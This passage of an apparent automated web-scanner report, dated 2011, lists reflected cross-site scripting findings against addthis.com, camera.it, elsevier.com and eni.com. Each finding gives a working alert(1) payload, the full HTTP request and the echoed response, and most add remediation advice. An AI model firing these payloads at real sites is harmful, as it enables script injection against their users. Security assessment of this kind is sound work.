Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 22:27:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=na3eafmrfnuoijcvtu7l23t2p7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpc22ac<script>alert(1)</script>da40de6267f</strong>
...[SNIP]...

4.26. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b091"-alert(1)-"92e0eaf77ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/9b091"-alert(1)-"92e0eaf77ed HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96059

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/9b091"-alert(1)-"92e0eaf77ed";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

4.27. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.camera.it
Path:   /1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1329'-alert(1)-'a5fb0683740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1?d1329'-alert(1)-'a5fb0683740=1 HTTP/1.1
Host: www.camera.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200 OK
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 1.44166
ETag: "e496177afdae7ff4447e02cf268914b0"
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.7.62 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
Content-Length: 40104
Date: Mon, 02 May 2011 22:30:06 GMT
X-Varnish: 1575083911
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: dmzxmweb04
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<!-- view_gr
...[SNIP]...
<![CDATA[
var taber = new XmTaber('agenda_lavori',
{
wi: 295,
queryString: 'd1329'-alert(1)-'a5fb0683740=1'
});

//]]>
...[SNIP]...

4.28. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.camera.it
Path:   /1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2627"><script>alert(1)</script>124a53125c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1?a2627"><script>alert(1)</script>124a53125c0=1 HTTP/1.1
Host: www.camera.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200 OK
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 1.47714
ETag: "ab31a19b0e5381536eb7992baefd6ac6"
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.7.62 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
Content-Length: 40439
Date: Mon, 02 May 2011 22:29:57 GMT
X-Varnish: 1575083881
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: dmzxmweb04
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<!-- view_gr
...[SNIP]...
<a href="1?a2627"><script>alert(1)</script>124a53125c0=1&amp;active_slide_262=4" class="prevSlide" title="precedente">
...[SNIP]...

4.29. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22997"%3bf38bccab9aa was submitted in the REST URL parameter 3. This input was echoed as 22997";f38bccab9aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/find/advproductsearch.cws_home22997"%3bf38bccab9aa HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24428
Set-Cookie: JSESSIONID=0000Tzc0jT3hhNK1M4Lr4GWcVwL:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<img src="+ns_l+" width='1' height='1'>");}
sitestat("http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.advproductsearch&category=cws_home22997";f38bccab9aa");
</script>
...[SNIP]...

4.30. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78bb0"><img%20src%3da%20onerror%3dalert(1)>67f5c92b011 was submitted in the REST URL parameter 3. This input was echoed as 78bb0"><img src=a onerror=alert(1)>67f5c92b011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /wps/find/advproductsearch.cws_home78bb0"><img%20src%3da%20onerror%3dalert(1)>67f5c92b011 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:32 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24970
Set-Cookie: JSESSIONID=0000-BYReYR8yxhLAjFkChZIJkl:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<img src="http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.advproductsearch&category=cws_home78bb0"><img src=a onerror=alert(1)>67f5c92b011" width="1" height="1">
...[SNIP]...

4.31. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 711ec'><img%20src%3da%20onerror%3dalert(1)>485db6800ac was submitted in the REST URL parameter 3. This input was echoed as 711ec'><img src=a onerror=alert(1)>485db6800ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /wps/find/advproductsearch.cws_home711ec'><img%20src%3da%20onerror%3dalert(1)>485db6800ac HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24968
Set-Cookie: JSESSIONID=00002FURpPzg7bKWUP9lHpWiGEE:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<LI class="lvl2" id="subItem2" onclick='window.location.href="/wps/find/all_products_browse.cws_home711ec'><img src=a onerror=alert(1)>485db6800ac"'>
...[SNIP]...

4.32. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6beef'><script>alert(1)</script>6a8aa79299f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/find/advproductsearch.cws_home?6beef'><script>alert(1)</script>6a8aa79299f=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:30 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 18350
Set-Cookie: JSESSIONID=0000-3iLOWqG5wZUSadWSvkeTti:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<a href='/wps/find/advproductsearch.cws_home?6beef'><script>alert(1)</script>6a8aa79299f=1&navopenmenu=3'>
...[SNIP]...

4.33. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/advproductsearch.cws_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7daa0"%3balert(1)//24fac7af3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7daa0";alert(1)//24fac7af3ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/find/advproductsearch.cws_home?7daa0"%3balert(1)//24fac7af3ed=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:30 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 18288
Set-Cookie: JSESSIONID=0000NaRz-vRLRFXUkrLZVh70rOz:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
("This page does not have a printer-friendly version")
                   return
               }
           } else {
               printUrl += pieces[i]
           }
           prvPiece = pieces[i]
       }
       var isTheirParams = "false"
       var qpString = "7daa0";alert(1)//24fac7af3ed=1&7daa0";alert(1)//24fac7af3ed=1"        
       if(qpString.length >
...[SNIP]...

4.34. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ff19'><img%20src%3da%20onerror%3dalert(1)>6e976a58f0b was submitted in the REST URL parameter 3. This input was echoed as 6ff19'><img src=a onerror=alert(1)>6e976a58f0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /wps/find/subject_area_browse.cws_home6ff19'><img%20src%3da%20onerror%3dalert(1)>6e976a58f0b HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 25013
Set-Cookie: JSESSIONID=0000WXbl3Gp56KXUmnZV1uMnTNX:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<LI class="lvl2" id="subItem2" onclick='window.location.href="/wps/find/all_products_browse.cws_home6ff19'><img src=a onerror=alert(1)>6e976a58f0b"'>
...[SNIP]...

4.35. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f99"><img%20src%3da%20onerror%3dalert(1)>9406b9f8f6e was submitted in the REST URL parameter 3. This input was echoed as 90f99"><img src=a onerror=alert(1)>9406b9f8f6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /wps/find/subject_area_browse.cws_home90f99"><img%20src%3da%20onerror%3dalert(1)>9406b9f8f6e HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:46 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 25015
Set-Cookie: JSESSIONID=0000ssegcLJle5F04Nbyc1eLqaz:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<img src="http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.subject_area_browse&category=cws_home90f99"><img src=a onerror=alert(1)>9406b9f8f6e" width="1" height="1">
...[SNIP]...

4.36. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c03b8"%3b28e045484d9 was submitted in the REST URL parameter 3. This input was echoed as c03b8";28e045484d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/find/subject_area_browse.cws_homec03b8"%3b28e045484d9 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24501
Set-Cookie: JSESSIONID=0000IqCGtqTnRlkAqBgeR1iBcZg:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<img src="+ns_l+" width='1' height='1'>");}
sitestat("http://nl.sitestat.com/elsevier/elsevier-com/s?general_info.subject_area_browse&category=cws_homec03b8";28e045484d9");
</script>
...[SNIP]...

4.37. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60b28'><script>alert(1)</script>3bb27476df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/find/subject_area_browse.cws_home?60b28'><script>alert(1)</script>3bb27476df4=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:42 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Set-Cookie: JSESSIONID=0000rcMiH_yB4nrWwiHnqA0Omt0:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 209457

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
<a href='/wps/find/subject_area_browse.cws_home?60b28'><script>alert(1)</script>3bb27476df4=1&navopenmenu=3'>
...[SNIP]...

4.38. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elsevier.com
Path:   /wps/find/subject_area_browse.cws_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e8cf"%3balert(1)//1fe8f7ceeb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e8cf";alert(1)//1fe8f7ceeb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/find/subject_area_browse.cws_home?9e8cf"%3balert(1)//1fe8f7ceeb7=1 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:44 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Set-Cookie: JSESSIONID=0000eJInQ8ymYaOaIpU3u5eS2ZN:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 209414

<!-- <NOSCRIPT>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/framework_home/NoScript.html">
</NOSCRIPT>-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3
...[SNIP]...
("This page does not have a printer-friendly version")
                   return
               }
           } else {
               printUrl += pieces[i]
           }
           prvPiece = pieces[i]
       }
       var isTheirParams = "false"
       var qpString = "9e8cf";alert(1)//1fe8f7ceeb7=1&9e8cf";alert(1)//1fe8f7ceeb7=1"        
       if(qpString.length >
...[SNIP]...

4.39. http://www.eni.com/mobile/page.do [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eni.com
Path:   /mobile/page.do

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2c81"><script>alert(1)</script>05d12a7095a was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/page.do?locale=it_ITc2c81"><script>alert(1)</script>05d12a7095a&content=home HTTP/1.1
Host: www.eni.com
Proxy-Connection: keep-alive
Referer: http://www.eni.com/en_IT/home.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
